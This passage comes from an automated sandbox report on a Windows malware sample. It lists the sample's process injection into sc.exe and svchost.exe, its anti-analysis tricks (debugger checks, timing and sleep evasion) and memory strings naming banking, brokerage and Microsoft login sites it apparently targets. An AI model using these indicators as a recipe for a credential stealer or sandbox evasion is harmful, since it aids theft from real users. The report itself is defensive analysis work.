            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B90395 pushfd ; retf 4_2_02B90396
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B84780 push edi; iretd 4_2_02B8478C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B84A3B push ss; ret 4_2_02B84A3C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B82B70 push esi; retf 4_2_02B82B9F
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B90871 push ebx; iretd 4_2_02B90872
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (104).png
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\foljNJ4bug.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\foljNJ4bug.exeAPI/Special instruction interceptor: Address: 403A264
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\sc.exeWindow / User API: threadDelayed 393Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeWindow / User API: threadDelayed 9580Jump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87788
            Source: C:\Users\user\Desktop\foljNJ4bug.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\sc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\sc.exe TID: 6628Thread sleep count: 393 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exe TID: 6628Thread sleep time: -786000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sc.exe TID: 6628Thread sleep count: 9580 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exe TID: 6628Thread sleep time: -19160000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe TID: 2820Thread sleep time: -95000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe TID: 2820Thread sleep count: 44 > 30Jump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe TID: 2820Thread sleep time: -44000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe TID: 2820Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe TID: 2820Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B8C320 FindFirstFileW,FindNextFileW,FindClose,4_2_02B8C320
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 0eYBs6_09.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: YKSXcXcWryn.exe, 00000008.00000002.4570035509.0000000000C8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
            Source: 0eYBs6_09.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 0eYBs6_09.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 0eYBs6_09.4.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 0eYBs6_09.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 0eYBs6_09.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 0eYBs6_09.4.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: firefox.exe, 0000000A.00000002.2567328110.000002200084C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
            Source: 0eYBs6_09.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 0eYBs6_09.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 0eYBs6_09.4.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 0eYBs6_09.4.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: 0eYBs6_09.4.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: 0eYBs6_09.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: sc.exe, 00000004.00000002.4568890860.000000000312E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 0eYBs6_09.4.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 0eYBs6_09.4.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 0eYBs6_09.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 0eYBs6_09.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 0eYBs6_09.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 0eYBs6_09.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 0eYBs6_09.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 0eYBs6_09.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 0eYBs6_09.4.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 0eYBs6_09.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 0eYBs6_09.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 0eYBs6_09.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 0eYBs6_09.4.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 0eYBs6_09.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 0eYBs6_09.4.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 0eYBs6_09.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 0eYBs6_09.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 0eYBs6_09.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\foljNJ4bug.exeAPI call chain: ExitProcess graph end nodegraph_0-86910
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417133 LdrLoadDll,2_2_00417133
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0403A4D0 mov eax, dword ptr fs:[00000030h]0_2_0403A4D0
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0403A530 mov eax, dword ptr fs:[00000030h]0_2_0403A530
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_04038EA0 mov eax, dword ptr fs:[00000030h]0_2_04038EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
